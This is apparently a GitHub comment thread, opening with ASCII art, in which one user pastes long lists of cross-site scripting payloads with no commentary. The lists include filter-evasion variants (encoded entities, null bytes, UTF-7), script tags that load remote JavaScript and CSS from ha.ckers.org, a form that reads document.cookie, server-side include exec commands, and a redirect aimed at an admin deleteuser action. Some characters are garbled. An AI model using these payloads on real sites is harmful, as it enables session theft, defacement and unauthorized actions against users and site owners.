                          .B@@@B@B@@@B@BML:,,....                         ,....           ..::::iiru@N@B@@@B@B@B@B@B@B@B                          
                           @@@B@B@B@B@B@O@Sr:,.,.                  .      .,. ..::         ..,,:iY0@YGB@B@B@B@B@B@@@B@B                           
                           B@B@B@B@B@B@Bqv@GL:,.          :::     .       ...   iuXPSYr:,....,i7XB@rvB@B@B@B@B@B@B@B@@1                           
                           @@@B@B@B@B@B@@i.MB0Jr:::i;7vuuJr,,.    .        ,.   .::v18M@MMZXSPZ@BO..@@B@B@@@B@B@B@B@B@                            
                           B@B@B@B@@@B@B@B. M@@BBMG0Ekur:.  .:    .        .:  iX:    .:7vS@@B@BJ  S@BMB@B@B@B@B@B@B@,                            
                           @B@B@B@B@B@B@@@M i@vM@@X          ruFr.         :7qB@G         0@B@82  i@BBZ@B@B@B@B@B@B@B                             
                           M@@@B@B@@@B@BBB@0 :N ZB@u          :q@BO7     .78@@2i.        0@B@L2.  @BBNMB@B@@@B@B@@@B                              
                           rB@B@B@B@B@B@B@B@u ,u ZB@X           ,@B@B8kkE@B@B1          O@@@L7i  E@@ZqB@B@B@B@B@B@Bq                              
                            @B@@@B@B@@@B@O@B@r :L BB@8:        ,@B@B@B@B@B@B@BO.  ..r2MB@B@j:L  rBMOPO@B@B@B@B@B@@@.                              
                            :@@@B@B@B@B@BMO@B@, ir @B@@@B@B@@@B@B@B@B@X1B@B@B@B@B@B@@@B@B@1.5  .BMZEX@B@B@B@@@B@B@B                               
                             B@B@B@B@B@B@BMB@@@. i7 FB@B@B@@@B@B@B@B@:   8@B@@@B@B@B@B@B@7 P.  B@X8PBB@@@B@B@B@B@B@                               
                              B@B@B@@@B@B@BBB@B@  iU   iuGB@B@B@B@B@:     M@B@@@M8Sur:.  :O:  X@k0qBB@B@B@B@B@B@B@B                               
                              J@@B@B@B@B@B@BBB@B@  :qr        .,:,iB@B@B@B@B8          .ZBi  J@kPPM@@B@B@B@B@B@@@B@                               
                             iB@B@B@B@B@B@B@@BM@BB  .UUL:.                          i1M@Mi  r@qSkM@@B@B@B@B@B@B@B@J                               
                            i@@B@B@B@B@B@B@B@@BO@BO   7rrvJ7i,.                .iuEOGkPqi  i@Z2SMB@B@B@B@B@B@B@B@B7                               
                           YB@B@B@B@B@B@B@B@B@BMGMBO   7i..:rvvLuEBGuJJuYUuU0BM@Mk7i:Lqi  :@Ou2BB@B@B@B@@@@@B@B@B@B@Or                            
                          LB@B@B@B@B@B@@@@@B@B@B@G8@8   r:.   . ,i0B@B@B@B@B@G5r:.,,rXi  ,@OJ2@B@B@B@B@B@B@@@B@B@B@@@@@0i                         
                      .kB@B@@@B@B@B@B@B@B@B@B@B@B@80OO.  i:         B@B@B@BM     .,:u7  :@8LS@@@B@B@@@B@B@B@B@B@B@@@B@@@B@@u.                     
                    LB@B@B@B@B@B@B@B@B@B@B@B@B@B@B@MSqM:  i:.       ZB@B@B@B    ..,rY  ,@ELX@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@82r,               
                 vM@B@B@B@B@B@B@B@@@B@B@B@B@B@@@B@@@B1YOr  ::.      M@B@B@B@:    .,7  ,@qvE@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B01v:       
            :YMB@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@2iXY  ,:      O@@@@@@B;    .:  :@kjM@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@L    
     :rFO@@@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@BGrJj: ,,     r@B@B@B@:    .  :MXPB@B@@@B@B@B@B@B@B@B@B@@@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@L 
.LMB@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@kjYi ..     B@@@B@B    .  :EZBB@@@B@B@@@B@B@B@B@B@B@@@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B

1@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@B@B@B@B@B@BZ2r OB@B@B@ ..:qB@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@
@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@@@B@B@B@@@M1: 7@B@@@M .,iZB@B@B@B@@@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B
B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@@@u: :B@B@BU ,;1@B@B@B@B@B@B@B@B@B@@@B@B@@@B@B@B@B@B@B@B@B@B@B@B@@@B@B@@@@@@@B@B@
@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@@@B@B@B@B@@@@@B@B@B@B@@@@@@@B@B@B@@@B@Bq7.,@@@B@,.vEB@B@@@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B
B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@@@B@B@B@@MM@B@M8B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@@@B@@@B@B@B@B@B@
@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@@@@@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@B@@@B@B@B@B@B@B@B@B
B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@@@B@B@B@B@@@@@B@B@B@B@
@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@B@B@@@@@@@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@@@B@B@B@B@B@B@B@B@B@@@B@B@@@B@B@@@B@B@@@B@B@B@B@B
B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@@@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@B@B@B@@@B@@@B@B@B@B@B@B@@@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@@@B@B@B@B@B@
@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@B@B@B@@@B@@@B@B@@@B@@@@@B@B@B@@@B@B@@@B@B@@@B@B@B@B@B@@@@@B@B
B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@@@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@@@B@
@B@B@B@@@B@B@B@B@B@B@B@B@@@B@@@B@B@@@B@B@@@@@@@B@B@B@B@B@B@B@B@B@B@B@B@B@B@@@B@B@B@B@B@B@@@@@B@B@@@B@B@B@@@B@@@B@B@@@B@B@B@B@@@B@B@B@B@B@B@B@@@B@B@B@@
MMMMOMMMMMMMOMMMOMOMMMMMMMMMMMMMOMMMMMMMOMMMMMMMOMMMOMOMMMMMOMMMMMMMMMMMMMMMOMMMMMMMMMOMOMMMMMMMOMMMOMMMMMMMMMMMOMMMMMOMMMMMMMOMMMOMOMMMMMMMMMOMMMMMOM


@andika085716730646 andika085716730646 commented Apr 29, 2020

<script>alert(123);</script> <ScRipT>alert("XSS");</ScRipT> <script>alert(123)</script> <script>alert("hellox worldss");</script> <script>alert(�XSS�)</script> <script>alert(�XSS�);</script> <script>alert(�XSS�)</script>

�><script>alert(�XSS�)</script>

<script>alert(/XSS�)</script> <script>alert(/XSS/)</script>

</script><script>alert(1)</script>
�; alert(1);
�)alert(1);//

<ScRiPt>alert(1)</sCriPt>

<iframe %00 src=" javascript:prompt(1) "%00> <style>{font-family:'' <scRipt %00>alert(1) {Opera}


@andika085716730646 andika085716730646 commented Apr 29, 2020

<img/src=@ onerror = prompt('1')
<style/onload=prompt('XSS')

<script ^__^>alert(String.fromCharCode(49))</script ^__^ </style ><script :-(>/**/alert(document.location)/**/</script :-( � <textarea onkeyup='\u0061\u006C\u0065\u0072\u0074(1)'> <script /***/>/***/confirm('\uFF41\uFF4C\uFF45\uFF52\uFF54\u1455\uFF11\u1450')/***/</script /***/ <iframe srcdoc='<body onload=prompt(1)>'> X <script ~~~>alert(0%0)</script ~~~> <///style///><span %2F onmousemove='alert&lpar;1&rpar;'>SPAN <img/src='http://i.imgur.com/P8mL8.jpg' onmouseover=&Tab;prompt(1) &#34;&#62;<svg>&lt;style>{-o-link-source&colon;'<body/onload=confirm(1)>' &#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(1)>OnMouseOver {Firefox & Opera} <marquee onstart='javascript:alert&#x28;1&#x29;'>^__^ <div/style="width:expression(confirm(1))">X</div> {IE7} <iframe/%00/ src=javaSCRIPT&colon;alert(1) //<form/action=javascript&#x3A;alert&lpar;document&period;cookie&rpar;> <input/type='submit'>// /*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(1) /*iframe/src*/> //|\\ &lt;script //|\\ src='https://dl.dropbox.com/u/13018058/js.js'> //|\\ &lt;/script //|\\ </font>/<svg>&lt;style>{src&#x3A;'<style/onload=this.onload=confirm(1)>'</font>/&lt;/style> <p>&lt;a/href=&quot;javascript: javascript:prompt(1)&quot;&gt;<input type="X"><br /> &lt;/plaintext&gt;&lt;/|&gt;&lt;plaintext/onmouseover=prompt(1)<br /> </svg>''<svg>&lt;script 'AQuickBrownFoxJumpsOverTheLazyDog'&gt;alert(1) {Opera}<br /> <a href="javascript&colon;\u0061&#x6C;&#101%72t&lpar;1&rpar;"><button></p> <div onmouseover='alert&lpar;1&rpar;'>DIV</div> &lt;iframe style="xg-p:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(1)"> <a href="jAvAsCrIpT&colon;alert&lpar;1&rpar;">X</a> <embed src="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <object data="http://corkami.googlecode.com/svn/!svn/bc/480/trunk/misc/pdf/helloworld_js_X.pdf"> <var onmouseover="prompt(1)">On Mouse Over</var>

@andika085716730646 andika085716730646 commented Apr 29, 2020

Click Here
<img src="/" =_=" title="onerror='prompt(1)'">
<%

<script src="data:text/javascript,alert(1)"></script>

<iframe/src //onload = prompt(1)
<iframe/onreadystatechange=alert(1)
<svg/onload=alert(1)
<input value=<><iframe/src=javascript:confirm(1)
<input type="text" value=`` <div/onmouseover='alert(1)'>X
http://www.<script>alert(1)</script .com

<iframe src=j a v a s c r&NewLine ; i p&N ewLine; t &T ab; :a &Tab ; l e &Ta b; r &T ab; t & Tab; 28 &Tab ; 1 &Ta b; %29></iframe> <script ?>alert(1) <iframe src=j a v a s c r i p t :a l e r t %28 1 %29></iframe>


@andika085716730646 andika085716730646 commented Apr 29, 2020

<script>// confirm(1);</script
<script onlypossibleinopera:-)> alert(1)
ClickMe

<script x> alert(1) </script 1=2
style="x:"> <--` --!>

@andika085716730646 andika085716730646 commented Apr 29, 2020

<IFRAME SRC="javascript:alert('XSS');"></IFRAME> <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> <SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> <<SCRIPT>alert("XSS");//<</SCRIPT> <"';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";aler t(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert( String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'> <SCRIPT>alert(String.fromCharCode(88,83,83))&submit.x=27&submit.y=9&cmd=search <script>alert("hellox worldss") </script>&safe=high&cx=006665157904466893121:su_tzknyxug&cof=FORID:9#510 <script>alert("XSS");</script>&search=1 0&q=';alert(String.fromCharCode(88,83,83))//\';alert%2? 8String.fromCharCode(88,83,83))//";alert(String.fromCharCode? (88,83,83))//\";alert(String.fromCharCode(88,83,83)%?29//--></SCRIPT>">'> <SCRIPT>alert(String.fromCharCode(88,83%?2C83))</SCRIPT>&submit-frmGoogleWeb=Web+Search

hellox worldss







...



lol

<style>

<script>alert(1)</script>"> <script>alert(1)</script>"> <script>alert(1)</script>"> "> <% foo>
LOL LOL<style>*{/*all*/color/*all*/:/*all*/red/*all*/;/[0]*IE,Safari* [0]/color:green;color:bl/*IE*/ue;}</style> <script>({0:#0=alert/#0#/#0#(0)})</script> LOL<script>alert(123)</script> <SCRIPT>alert(/XSS/.source)</SCRIPT> \\";alert('XSS');// </TITLE><SCRIPT>alert(\"XSS\");</SCRIPT> <INPUT TYPE=\"IMAGE\" SRC=\"javascript:alert('XSS');\"> <BODY BACKGROUND=\"javascript:alert('XSS')\"> <BODY ONLOAD=alert('XSS')> <IMG DYNSRC=\"javascript:alert('XSS')\"> <IMG LOWSRC=\"javascript:alert('XSS')\"> <BGSOUND SRC=\"javascript:alert('XSS');\"> <BR SIZE=\"&{alert('XSS')}\"> <LAYER SRC=\"http://ha.ckers.org/scriptlet.html\"></LAYER> <LINK REL=\"stylesheet\" HREF=\"javascript:alert('XSS');\"> <LINK REL=\"stylesheet\" HREF=\"http://ha.ckers.org/xss.css\"> <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> <META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\"> <STYLE>BODY{-moz- binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE> <XSS STYLE=\"behavior: url(xss.htc);\"> <STYLE>li {list-style-image: url(\"javascript:alert('XSS')\");}</STYLE><UL><LI>XSS

@andika085716730646 andika085716730646 commented Apr 29, 2020

DEFER>alert("XSS")</SCRIPT>">
</BODY></HTML>
<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT
SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';
echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?
somevariables=maliciouscode">
Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
<META HTTP-EQUIV="Set-Cookie"
Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7">
</HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" ''
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=&gt; SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>"
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT
SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
<A HREF="http://1113982867/">XSS</A>
<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
<A HREF="http://0102.0146.0007.00000223/">XSS</A>
<A HREF="htt p://6 6.000146.0x7.147/">XSS</A>
<A HREF="//www.google.com/">XSS</A>
<A HREF="//google">XSS</A>
<A HREF="http://ha.ckers.org@google">XSS</A>
<A HREF="http://google:ha.ckers.org">XSS</A>
<A HREF="http://google.com/">XSS</A>
<A HREF="http://www.google.com./">XSS</A>
<A
HREF="javascript:document.location='http://www.google.com/'">XS
S</A>
<A
HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</
A>
<
%3C
&lt
<
&LT
<
&#60
&#60
&#60
&#60
&#60
&#60
<
&#x3c
&#x03c
&#x003c
&#x0003c
&#x00003c
&#x000003c
<
<
<
<
<


@andika085716730646 andika085716730646 commented Apr 29, 2020

<IMG SRC="javascript:alert('XSS');">